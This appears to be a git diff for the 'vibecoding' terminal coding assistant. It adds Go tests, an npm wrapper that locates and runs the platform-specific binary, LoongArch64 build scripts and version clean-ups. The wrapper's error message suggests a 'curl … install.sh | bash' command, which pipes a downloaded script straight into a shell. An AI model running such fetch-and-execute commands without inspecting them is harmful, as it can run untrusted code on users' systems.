+func TestRgPath(t *testing.T) {
+	home := withTempHome(t)
+	path := RgPath()
+	if path == "" {
+		t.Fatal("RgPath returned empty")
+	}
+	ext := ""
+	if runtime.GOOS == "windows" {
+		ext = ".exe"
+	}
+	want := filepath.Join(home, ".vibecoding", "bin", "rg"+ext)
+	if path != want {
+		t.Errorf("RgPath = %q, want %q", path, want)
+	}
+}
+
+func TestFdPath(t *testing.T) {
+	home := withTempHome(t)
+	path := FdPath()
+	if path == "" {
+		t.Fatal("FdPath returned empty")
+	}
+	ext := ""
+	if runtime.GOOS == "windows" {
+		ext = ".exe"
+	}
+	want := filepath.Join(home, ".vibecoding", "bin", "fd"+ext)
+	if path != want {
+		t.Errorf("FdPath = %q, want %q", path, want)
+	}
+}
+
+// --- Ensure ---
+
+func TestEnsure(t *testing.T) {
+	if !HasEmbeddedTools() {
+		t.Skip("vendored rg/fd are not embedded for this platform")
+	}
+
+	withTempHome(t)
+
+	if err := Ensure(); err != nil {
+		t.Fatalf("Ensure: %v", err)
+	}
+
+	// Verify both binaries exist
+	rgPath := RgPath()
+	fdPath := FdPath()
+
+	rgInfo, err := os.Stat(rgPath)
+	if err != nil {
+		t.Fatalf("rg not found at %s: %v", rgPath, err)
+	}
+	if rgInfo.Size() == 0 {
+		t.Error("rg binary is empty")
+	}
+
+	fdInfo, err := os.Stat(fdPath)
+	if err != nil {
+		t.Fatalf("fd not found at %s: %v", fdPath, err)
+	}
+	if fdInfo.Size() == 0 {
+		t.Error("fd binary is empty")
+	}
+
+	// Verify executable
+	if runtime.GOOS != "windows" {
+		if rgInfo.Mode()&0o111 == 0 {
+			t.Error("rg should be executable")
+		}
+		if fdInfo.Mode()&0o111 == 0 {
+			t.Error("fd should be executable")
+		}
+	}
+}
+
+func TestEnsure_Idempotent(t *testing.T) {
+	if !HasEmbeddedTools() {
+		t.Skip("vendored rg/fd are not embedded for this platform")
+	}
+
+	withTempHome(t)
+
+	// First call
+	if err := Ensure(); err != nil {
+		t.Fatalf("first Ensure: %v", err)
+	}
+	info1, _ := os.Stat(RgPath())
+
+	// Second call — should skip (idempotent)
+	if err := Ensure(); err != nil {
+		t.Fatalf("second Ensure: %v", err)
+	}
+	info2, _ := os.Stat(RgPath())
+
+	if info2.ModTime() != info1.ModTime() {
+		t.Error("Ensure should be idempotent (no rewrite on second call)")
+	}
+}
diff --git a/npm/.npmignore b/npm/.npmignore
index 50d71d5..d8cb2f8 100644
--- a/npm/.npmignore
+++ b/npm/.npmignore
@@ -1,15 +1,5 @@
-# Ignore everything
-*
-
-# Except these files
-!package.json
-!postinstall.js
-!index.js
-!README.md
-
-# Ignore generated files
-tgz
+# Package contents are controlled by package.json "files".
 *.tgz
 
-# Ignore platform packages directory (published as separate packages)
+# Platform packages are published separately.
 packages/
diff --git a/npm/bin/vibecoding b/npm/bin/vibecoding
new file mode 100755
index 0000000..7eed5e2
--- /dev/null
+++ b/npm/bin/vibecoding
@@ -0,0 +1,126 @@
+#!/usr/bin/env node
+
+// Wrapper script that resolves and executes the platform-specific binary.
+// When installed via `npm i -g vibecoding-installer`, this script finds the
+// correct binary from the platform-specific optional dependency package.
+
+const { execFileSync } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+
+// Map npm os/cpu to package name
+const PLATFORM_MAP = {
+  'linux-x64-glibc': 'vibecoding-installer-linux-x64',
+  'linux-arm64-glibc': 'vibecoding-installer-linux-arm64',
+  'linux-loong64-glibc': 'vibecoding-installer-linux-loong64',
+  'linux-x64-musl': 'vibecoding-installer-linux-musl-x64',
+  'darwin-x64': 'vibecoding-installer-darwin-x64',
+  'darwin-arm64': 'vibecoding-installer-darwin-arm64',
+  'win32-x64': 'vibecoding-installer-win32-x64',
+  'win32-arm64': 'vibecoding-installer-win32-arm64',
+};
+
+function detectPlatform() {
+  const os = process.platform;   // 'linux', 'darwin', 'win32'
+  const arch = process.arch;     // 'x64', 'arm64'
+
+  if (os === 'linux') {
+    // Detect libc: musl or glibc
+    const isMusl = (() => {
+      try {
+        // Check for Alpine's musl
+        if (fs.existsSync('/etc/alpine-release')) return true;
+        // Check ldd output for musl
+        const { execSync } = require('child_process');
+        const output = execSync('ldd --version 2>&1 || true', { encoding: 'utf8' });
+        return output.includes('musl');
+      } catch {
+        return false;
+      }
+    })();
+
+    return `${os}-${arch}-${isMusl ? 'musl' : 'glibc'}`;
+  }
+
+  return `${os}-${arch}`;
+}
+
+function findBinary() {
+  const platform = detectPlatform();
+  const packageName = PLATFORM_MAP[platform];
+
+  if (!packageName) {
+    console.error(`Unsupported platform: ${platform}`);
+    console.error(`Supported platforms: ${Object.keys(PLATFORM_MAP).join(', ')}`);
+    process.exit(1);
+  }
+
+  const searchDirs = [];
+  const addSearchDir = (dir) => {
+    if (dir && !searchDirs.includes(dir)) {
+      searchDirs.push(dir);
+    }
+  };
+
+  try {
+    addSearchDir(path.dirname(require.resolve(`${packageName}/package.json`)));
+  } catch {
+    // Keep explicit fallbacks below for unusual npm layouts.
+  }
+
+  // npm usually installs dependencies under this package. Some global installs
+  // or package managers may hoist them as siblings, so check both layouts.
+  addSearchDir(path.join(__dirname, '..', 'node_modules', packageName));
+  addSearchDir(path.join(__dirname, '..', '..', packageName));
+
+  for (const pkgDir of searchDirs) {
+    const binName = process.platform === 'win32' ? 'vibecoding.exe' : 'vibecoding';
+    const binPath = path.join(pkgDir, 'bin', binName);
+
+    if (fs.existsSync(binPath)) {
+      return binPath;
+    }
+  }
+
+  // Fallback: check if there's a binary directly in the main package's bin/
+  // (old single-package layout, or development mode)
+  const fallbackBinName = (() => {
+    const suffix = process.platform === 'win32' ? '.exe' : '';
+    const osMap = { linux: 'linux', darwin: 'darwin', win32: 'windows' };
+    const archMap = { x64: 'amd64', arm64: 'arm64', loong64: 'loong64' };
+    return `vibecoding-${osMap[process.platform]}-${archMap[process.arch]}${suffix}`;
+  })();
+
+  const fallbackPath = path.join(__dirname, fallbackBinName);
+  if (fs.existsSync(fallbackPath)) {
+    return fallbackPath;
+  }
+
+  console.error(`Could not find VibeCoding binary for platform: ${detectPlatform()}`);
+  console.error(`Searched for package: ${packageName}`);
+  console.error(`Searched in: ${searchDirs.join(', ')}`);
+  console.error('');
+  console.error('If you installed globally, try reinstalling:');
+  console.error('  npm install -g vibecoding-installer');
+  console.error('');
+  console.error('If the problem persists, install via one-line script instead:');
+  console.error('  curl -fsSL https://raw.githubusercontent.com/startvibecoding/vibecoding/main/install.sh | bash');
+  process.exit(1);
+}
+
+// Main
+const binaryPath = findBinary();
+const args = process.argv.slice(2);
+
+try {
+  execFileSync(binaryPath, args, { stdio: 'inherit' });
+} catch (err) {
+  // Forward the exit code
+  if (err.status !== undefined) {
+    process.exit(err.status);
+  }
+  if (err.code) {
+    process.exit(1);
+  }
+  process.exit(1);
+}
diff --git a/npm/index.js b/npm/index.js
deleted file mode 100644
index 6caefe6..0000000
--- a/npm/index.js
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env node
-
-const { platform, arch } = require('os');
-const fs = require('fs');
-const path = require('path');
-
-// Platform/arch mapping to npm package name
-const PLATFORM_PACKAGES = {
-  'linux-x64':    'vibecoding-installer-linux-x64',
-  'linux-arm64':  'vibecoding-installer-linux-arm64',
-  'darwin-x64':   'vibecoding-installer-darwin-x64',
-  'darwin-arm64': 'vibecoding-installer-darwin-arm64',
-  'win32-x64':    'vibecoding-installer-win32-x64',
-  'win32-arm64':  'vibecoding-installer-win32-arm64',
-};
-
-const key = `${platform()}-${arch()}`;
-const pkgName = PLATFORM_PACKAGES[key];
-
-if (!pkgName) {
-  throw new Error(
-    `Unsupported platform: ${key}\n` +
-    `Supported: ${Object.keys(PLATFORM_PACKAGES).join(', ')}`
-  );
-}
-
-const isWindows = platform() === 'win32';
-const binaryName = isWindows ? 'vibecoding.exe' : 'vibecoding';
-const binPath = path.join(path.dirname(require.resolve(pkgName)), 'bin', binaryName);
-
-module.exports = binPath;
diff --git a/npm/package.json b/npm/package.json
index eab900f..784bae3 100644
--- a/npm/package.json
+++ b/npm/package.json
@@ -1,14 +1,14 @@
 {
   "name": "vibecoding-installer",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "AI coding assistant for the terminal",
-  "main": "index.js",
   "bin": {
     "vibecoding": "bin/vibecoding"
   },
-  "scripts": {
-    "postinstall": "node postinstall.js"
-  },
+  "files": [
+    "bin/",
+    "README.md"
+  ],
   "keywords": [
     "ai",
     "coding",
@@ -30,12 +30,13 @@
     "node": ">=14"
   },
   "optionalDependencies": {
-    "vibecoding-installer-linux-x64": "v0.1.25-1-g263c076-dirty",
-    "vibecoding-installer-linux-arm64": "v0.1.25-1-g263c076-dirty",
-    "vibecoding-installer-linux-musl-x64": "v0.1.25-1-g263c076-dirty",
-    "vibecoding-installer-darwin-x64": "v0.1.25-1-g263c076-dirty",
-    "vibecoding-installer-darwin-arm64": "v0.1.25-1-g263c076-dirty",
-    "vibecoding-installer-win32-x64": "v0.1.25-1-g263c076-dirty",
-    "vibecoding-installer-win32-arm64": "v0.1.25-1-g263c076-dirty"
+    "vibecoding-installer-linux-x64": "0.1.32",
+    "vibecoding-installer-linux-arm64": "0.1.32",
+    "vibecoding-installer-linux-loong64": "0.1.32",
+    "vibecoding-installer-linux-musl-x64": "0.1.32",
+    "vibecoding-installer-darwin-x64": "0.1.32",
+    "vibecoding-installer-darwin-arm64": "0.1.32",
+    "vibecoding-installer-win32-x64": "0.1.32",
+    "vibecoding-installer-win32-arm64": "0.1.32"
   }
 }
diff --git a/npm/packages/vibecoding-installer-darwin-arm64/package.json b/npm/packages/vibecoding-installer-darwin-arm64/package.json
index d8fc9d2..89936aa 100644
--- a/npm/packages/vibecoding-installer-darwin-arm64/package.json
+++ b/npm/packages/vibecoding-installer-darwin-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-darwin-arm64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for darwin-arm64",
   "os": ["darwin"],
   "cpu": ["arm64"],
diff --git a/npm/packages/vibecoding-installer-darwin-x64/package.json b/npm/packages/vibecoding-installer-darwin-x64/package.json
index e565776..bde8257 100644
--- a/npm/packages/vibecoding-installer-darwin-x64/package.json
+++ b/npm/packages/vibecoding-installer-darwin-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-darwin-x64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for darwin-x64",
   "os": ["darwin"],
   "cpu": ["x64"],
diff --git a/npm/packages/vibecoding-installer-linux-arm64/package.json b/npm/packages/vibecoding-installer-linux-arm64/package.json
index e7b0ffc..8e9cabc 100644
--- a/npm/packages/vibecoding-installer-linux-arm64/package.json
+++ b/npm/packages/vibecoding-installer-linux-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-linux-arm64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for linux-arm64",
   "os": ["linux"],
   "cpu": ["arm64"],
diff --git a/npm/packages/vibecoding-installer-linux-loong64/package.json b/npm/packages/vibecoding-installer-linux-loong64/package.json
new file mode 100644
index 0000000..7db884d
--- /dev/null
+++ b/npm/packages/vibecoding-installer-linux-loong64/package.json
@@ -0,0 +1,15 @@
+{
+  "name": "vibecoding-installer-linux-loong64",
+  "version": "0.1.32",
+  "description": "VibeCoding native binary for linux-loong64",
+  "os": ["linux"],
+  "cpu": ["loong64"],
+  "libc": ["glibc"],
+  "files": ["bin/"],
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/startvibecoding/vibecoding.git",
+    "directory": "npm"
+  }
+}
diff --git a/npm/packages/vibecoding-installer-linux-musl-x64/package.json b/npm/packages/vibecoding-installer-linux-musl-x64/package.json
index 95281fb..621455a 100644
--- a/npm/packages/vibecoding-installer-linux-musl-x64/package.json
+++ b/npm/packages/vibecoding-installer-linux-musl-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-linux-musl-x64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for linux-x64 (musl static)",
   "os": ["linux"],
   "cpu": ["x64"],
diff --git a/npm/packages/vibecoding-installer-linux-x64/package.json b/npm/packages/vibecoding-installer-linux-x64/package.json
index c927ed8..acff1d6 100644
--- a/npm/packages/vibecoding-installer-linux-x64/package.json
+++ b/npm/packages/vibecoding-installer-linux-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-linux-x64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for linux-x64",
   "os": ["linux"],
   "cpu": ["x64"],
diff --git a/npm/packages/vibecoding-installer-win32-arm64/package.json b/npm/packages/vibecoding-installer-win32-arm64/package.json
index e730d5b..64fcba9 100644
--- a/npm/packages/vibecoding-installer-win32-arm64/package.json
+++ b/npm/packages/vibecoding-installer-win32-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-win32-arm64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for win32-arm64",
   "os": ["win32"],
   "cpu": ["arm64"],
diff --git a/npm/packages/vibecoding-installer-win32-x64/package.json b/npm/packages/vibecoding-installer-win32-x64/package.json
index 912400d..bcf96fe 100644
--- a/npm/packages/vibecoding-installer-win32-x64/package.json
+++ b/npm/packages/vibecoding-installer-win32-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-win32-x64",
-  "version": "v0.1.25-1-g263c076-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for win32-x64",
   "os": ["win32"],
   "cpu": ["x64"],
diff --git a/npm/postinstall.js b/npm/postinstall.js
deleted file mode 100644
index d2c5e67..0000000
--- a/npm/postinstall.js
+++ /dev/null
@@ -1,91 +0,0 @@
-#!/usr/bin/env node
-
-// Since npm installs the correct platform package via optionalDependencies,
-// this script just finds the installed platform binary and links it to bin/.
-
-const { platform, arch } = require('os');
-const fs = require('fs');
-const path = require('path');
-const { execSync } = require('child_process');
-
-function isMusl() {
-  try {
-    const output = execSync('ldd --version 2>&1', { encoding: 'utf8', timeout: 3000 });
-    return output.includes('musl');
-  } catch {
-    // ldd not found or error, check for musl library
-    try {
-      fs.readdirSync('/lib').some(f => f.startsWith('ld-musl'));
-      return true;
-    } catch {
-      return false;
-    }
-  }
-}
-
-function getPlatformKey() {
-  const p = platform();
-  const a = arch();
-  if (p === 'linux' && isMusl()) {
-    return `linux-musl-${a}`;
-  }
-  return `${p}-${a}`;
-}
-
-const PLATFORM_PACKAGES = {
-  'linux-x64':        'vibecoding-installer-linux-x64',
-  'linux-arm64':      'vibecoding-installer-linux-arm64',
-  'linux-musl-x64':   'vibecoding-installer-linux-musl-x64',
-  'darwin-x64':       'vibecoding-installer-darwin-x64',
-  'darwin-arm64':     'vibecoding-installer-darwin-arm64',
-  'win32-x64':        'vibecoding-installer-win32-x64',
-  'win32-arm64':      'vibecoding-installer-win32-arm64',
-};
-
-function main() {
-  const key = getPlatformKey();
-  const pkgName = PLATFORM_PACKAGES[key];
-
-  if (!pkgName) {
-    console.error(`Error: Unsupported platform: ${key}`);
-    console.error(`Supported: ${Object.keys(PLATFORM_PACKAGES).join(', ')}`);
-    process.exit(1);
-  }
-
-  // Find the platform package in node_modules
-  let platformPkgDir;
-  try {
-    platformPkgDir = path.dirname(require.resolve(pkgName + '/package.json'));
-  } catch {
-    console.error(`Error: Platform package '${pkgName}' not installed.`);
-    console.error('Your platform may not be supported, or the optional dependency was skipped.');
-    process.exit(1);
-  }
-
-  const isWindows = platform() === 'win32';
-  const srcName = isWindows ? 'vibecoding.exe' : 'vibecoding';
-  const destName = isWindows ? 'vibecoding.exe' : 'vibecoding';
-
-  const srcPath = path.join(platformPkgDir, 'bin', srcName);
-  const destPath = path.join(__dirname, 'bin', destName);
-
-  if (!fs.existsSync(srcPath)) {
-    console.error(`Error: Binary not found at ${srcPath}`);
-    process.exit(1);
-  }
-
-  // Ensure bin directory exists
-  const binDir = path.join(__dirname, 'bin');
-  fs.mkdirSync(binDir, { recursive: true });
-
-  // Copy binary
-  fs.copyFileSync(srcPath, destPath);
-
-  if (!isWindows) {
-    fs.chmodSync(destPath, '755');
-  }
-
-  console.log(`VibeCoding installed successfully (${key})`);
-}
-
-main();
diff --git a/scripts/build-deb.sh b/scripts/build-deb.sh
index 1430c1c..23d0867 100755
--- a/scripts/build-deb.sh
+++ b/scripts/build-deb.sh
@@ -7,16 +7,17 @@ set -e
 
 BINARY_NAME="vibecoding"
 PACKAGE_NAME="vibecoding"
-MAINTAINER="VibeCoding Team <team@vibecoding.dev>"
+MAINTAINER="VibeCoding Team <admin@pkold.com>"
 DESCRIPTION="AI-powered terminal coding assistant"
 HOMEPAGE="https://github.com/startvibecoding/vibecoding"
 
 # Parse arguments
 ARCH="${1:-amd64}"
-VERSION="${2:-$(git describe --tags --always --dirty 2>/dev/null || echo "0.0.1")}"
+VERSION="${2:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
 
 # Remove leading 'v' if present
 VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 BUILD_DIR="dist/deb"
 PACKAGE_DIR="${BUILD_DIR}/${PACKAGE_NAME}_${VERSION}_${ARCH}"
diff --git a/scripts/build-loongarch.sh b/scripts/build-loongarch.sh
new file mode 100755
index 0000000..a7c7bc9
--- /dev/null
+++ b/scripts/build-loongarch.sh
@@ -0,0 +1,26 @@
+#!/bin/bash
+set -e
+
+# Build and package the Linux LoongArch64 (GOARCH=loong64) release.
+# Usage: ./scripts/build-loongarch.sh [version]
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+PROJECT_ROOT="$(dirname "${SCRIPT_DIR}")"
+
+VERSION="${1:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
+
+cd "${PROJECT_ROOT}"
+
+echo "Building Linux LoongArch64 binary..."
+make build-linux-loong64 VERSION="${VERSION}"
+
+echo ""
+echo "Packaging Linux LoongArch64 tarball..."
+"${SCRIPT_DIR}/build-tarball.sh" linux loong64 "${VERSION}"
+
+echo ""
+echo "Packaging Linux LoongArch64 Debian package..."
+"${SCRIPT_DIR}/build-deb.sh" loong64 "${VERSION}"
+
+echo ""
+echo "LoongArch64 packages created under dist/"
diff --git a/scripts/build-npm-packages.sh b/scripts/build-npm-packages.sh
index b6b4845..73c7847 100755
--- a/scripts/build-npm-packages.sh
+++ b/scripts/build-npm-packages.sh
@@ -12,10 +12,20 @@ NPM_DIR="$PROJECT_ROOT/npm"
 BUILD_DIR="$PROJECT_ROOT/bin"
 PACKAGES_DIR="$NPM_DIR/packages"
 
+ensure_wrapper() {
+  mkdir -p "$NPM_DIR/bin"
+  if ! cmp -s "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"; then
+    cp "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"
+  fi
+  chmod +x "$NPM_DIR/bin/vibecoding"
+}
+
 # Clean packages directory
 rm -rf "$PACKAGES_DIR"
 
 # Check if binaries exist
+ensure_wrapper
+
 if [ ! -d "$BUILD_DIR" ]; then
   echo "Error: Build directory not found. Run 'make build-all' first."
   exit 1
@@ -28,6 +38,7 @@ VERSION=$(node -e "console.log(require('$NPM_DIR/package.json').version)")
 declare -A PLATFORMS=(
   ["linux-x64"]="vibecoding-linux-amd64"
   ["linux-arm64"]="vibecoding-linux-arm64"
+  ["linux-loong64"]="vibecoding-linux-loong64"
   ["linux-musl-x64"]="vibecoding-linux-musl-amd64"
   ["darwin-x64"]="vibecoding-darwin-amd64"
   ["darwin-arm64"]="vibecoding-darwin-arm64"
@@ -38,6 +49,7 @@ declare -A PLATFORMS=(
 declare -A OS_MAP=(
   ["linux-x64"]="linux"
   ["linux-arm64"]="linux"
+  ["linux-loong64"]="linux"
   ["linux-musl-x64"]="linux"
   ["darwin-x64"]="darwin"
   ["darwin-arm64"]="darwin"
@@ -48,6 +60,7 @@ declare -A OS_MAP=(
 declare -A CPU_MAP=(
   ["linux-x64"]="x64"
   ["linux-arm64"]="arm64"
+  ["linux-loong64"]="loong64"
   ["linux-musl-x64"]="x64"
   ["darwin-x64"]="x64"
   ["darwin-arm64"]="arm64"
diff --git a/scripts/build-npm.sh b/scripts/build-npm.sh
index e0cc527..498c8d2 100755
--- a/scripts/build-npm.sh
+++ b/scripts/build-npm.sh
@@ -10,11 +10,21 @@ NPM_DIR="$PROJECT_ROOT/npm"
 BIN_DIR="$NPM_DIR/bin"
 BUILD_DIR="$PROJECT_ROOT/bin"
 
+ensure_wrapper() {
+  mkdir -p "$NPM_DIR/bin"
+  if ! cmp -s "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"; then
+    cp "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"
+  fi
+  chmod +x "$NPM_DIR/bin/vibecoding"
+}
+
 # Clean and create bin directory
 rm -rf "$BIN_DIR"
 mkdir -p "$BIN_DIR"
 
 # Check if binaries exist
+ensure_wrapper
+
 if [ ! -d "$BUILD_DIR" ]; then
   echo "Error: Build directory not found. Run 'make build-all' first."
   exit 1
diff --git a/scripts/build-tarball.sh b/scripts/build-tarball.sh
index 9f8f79c..ae60efc 100755
--- a/scripts/build-tarball.sh
+++ b/scripts/build-tarball.sh
@@ -11,10 +11,11 @@ PACKAGE_NAME="vibecoding"
 # Parse arguments
 OS="${1:-linux}"
 ARCH="${2:-amd64}"
-VERSION="${3:-$(git describe --tags --always --dirty 2>/dev/null || echo "0.0.1")}"
+VERSION="${3:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
 
 # Remove leading 'v' if present
 VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 BUILD_DIR="dist/tarball"
 TARBALL_NAME="${PACKAGE_NAME}-${VERSION}-${OS}-${ARCH}"
diff --git a/scripts/build-zip.sh b/scripts/build-zip.sh
index 06d7163..d2ccf43 100755
--- a/scripts/build-zip.sh
+++ b/scripts/build-zip.sh
@@ -10,10 +10,11 @@ PACKAGE_NAME="vibecoding"
 
 # Parse arguments
 ARCH="${1:-amd64}"
-VERSION="${2:-$(git describe --tags --always --dirty 2>/dev/null || echo "0.0.1")}"
+VERSION="${2:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
 
 # Remove leading 'v' if present
 VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 BUILD_DIR="dist/zip"
 ZIP_NAME="${PACKAGE_NAME}-${VERSION}-windows-${ARCH}"
diff --git a/scripts/npm-installer-wrapper.js b/scripts/npm-installer-wrapper.js
new file mode 100755
index 0000000..7eed5e2
--- /dev/null
+++ b/scripts/npm-installer-wrapper.js
@@ -0,0 +1,126 @@
+#!/usr/bin/env node
+
+// Wrapper script that resolves and executes the platform-specific binary.
+// When installed via `npm i -g vibecoding-installer`, this script finds the
+// correct binary from the platform-specific optional dependency package.
+
+const { execFileSync } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+
+// Map npm os/cpu to package name
+const PLATFORM_MAP = {
+  'linux-x64-glibc': 'vibecoding-installer-linux-x64',
+  'linux-arm64-glibc': 'vibecoding-installer-linux-arm64',
+  'linux-loong64-glibc': 'vibecoding-installer-linux-loong64',
+  'linux-x64-musl': 'vibecoding-installer-linux-musl-x64',
+  'darwin-x64': 'vibecoding-installer-darwin-x64',
+  'darwin-arm64': 'vibecoding-installer-darwin-arm64',
+  'win32-x64': 'vibecoding-installer-win32-x64',
+  'win32-arm64': 'vibecoding-installer-win32-arm64',
+};
+
+function detectPlatform() {
+  const os = process.platform;   // 'linux', 'darwin', 'win32'
+  const arch = process.arch;     // 'x64', 'arm64'
+
+  if (os === 'linux') {
+    // Detect libc: musl or glibc
+    const isMusl = (() => {
+      try {
+        // Check for Alpine's musl
+        if (fs.existsSync('/etc/alpine-release')) return true;
+        // Check ldd output for musl
+        const { execSync } = require('child_process');
+        const output = execSync('ldd --version 2>&1 || true', { encoding: 'utf8' });
+        return output.includes('musl');
+      } catch {
+        return false;
+      }
+    })();
+
+    return `${os}-${arch}-${isMusl ? 'musl' : 'glibc'}`;
+  }
+
+  return `${os}-${arch}`;
+}
+
+function findBinary() {
+  const platform = detectPlatform();
+  const packageName = PLATFORM_MAP[platform];
+
+  if (!packageName) {
+    console.error(`Unsupported platform: ${platform}`);
+    console.error(`Supported platforms: ${Object.keys(PLATFORM_MAP).join(', ')}`);
+    process.exit(1);
+  }
+
+  const searchDirs = [];
+  const addSearchDir = (dir) => {
+    if (dir && !searchDirs.includes(dir)) {
+      searchDirs.push(dir);
+    }
+  };
+
+  try {
+    addSearchDir(path.dirname(require.resolve(`${packageName}/package.json`)));
+  } catch {
+    // Keep explicit fallbacks below for unusual npm layouts.
+  }
+
+  // npm usually installs dependencies under this package. Some global installs
+  // or package managers may hoist them as siblings, so check both layouts.
+  addSearchDir(path.join(__dirname, '..', 'node_modules', packageName));
+  addSearchDir(path.join(__dirname, '..', '..', packageName));
+
+  for (const pkgDir of searchDirs) {
+    const binName = process.platform === 'win32' ? 'vibecoding.exe' : 'vibecoding';
+    const binPath = path.join(pkgDir, 'bin', binName);
+
+    if (fs.existsSync(binPath)) {
+      return binPath;
+    }
+  }
+
+  // Fallback: check if there's a binary directly in the main package's bin/
+  // (old single-package layout, or development mode)
+  const fallbackBinName = (() => {
+    const suffix = process.platform === 'win32' ? '.exe' : '';
+    const osMap = { linux: 'linux', darwin: 'darwin', win32: 'windows' };
+    const archMap = { x64: 'amd64', arm64: 'arm64', loong64: 'loong64' };
+    return `vibecoding-${osMap[process.platform]}-${archMap[process.arch]}${suffix}`;
+  })();
+
+  const fallbackPath = path.join(__dirname, fallbackBinName);
+  if (fs.existsSync(fallbackPath)) {
+    return fallbackPath;
+  }
+
+  console.error(`Could not find VibeCoding binary for platform: ${detectPlatform()}`);
+  console.error(`Searched for package: ${packageName}`);
+  console.error(`Searched in: ${searchDirs.join(', ')}`);
+  console.error('');
+  console.error('If you installed globally, try reinstalling:');
+  console.error('  npm install -g vibecoding-installer');
+  console.error('');
+  console.error('If the problem persists, install via one-line script instead:');
+  console.error('  curl -fsSL https://raw.githubusercontent.com/startvibecoding/vibecoding/main/install.sh | bash');
+  process.exit(1);
+}
+
+// Main
+const binaryPath = findBinary();
+const args = process.argv.slice(2);
+
+try {
+  execFileSync(binaryPath, args, { stdio: 'inherit' });
+} catch (err) {
+  // Forward the exit code
+  if (err.status !== undefined) {
+    process.exit(err.status);
+  }
+  if (err.code) {
+    process.exit(1);
+  }
+  process.exit(1);
+}
diff --git a/scripts/sync-npm-version.sh b/scripts/sync-npm-version.sh
index 1ae7122..ed31ad1 100755
--- a/scripts/sync-npm-version.sh
+++ b/scripts/sync-npm-version.sh
@@ -13,12 +13,14 @@ PACKAGE_JSON="$NPM_DIR/package.json"
 if [ -n "$1" ]; then
   VERSION="$1"
 else
-  VERSION=$(git describe --tags --always --dirty 2>/dev/null | sed 's/^v//')
+  VERSION=$(git describe --tags --always 2>/dev/null)
   if [ -z "$VERSION" ]; then
     echo "Error: Could not determine version"
     exit 1
   fi
 fi
+VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 echo "Syncing npm version to: $VERSION"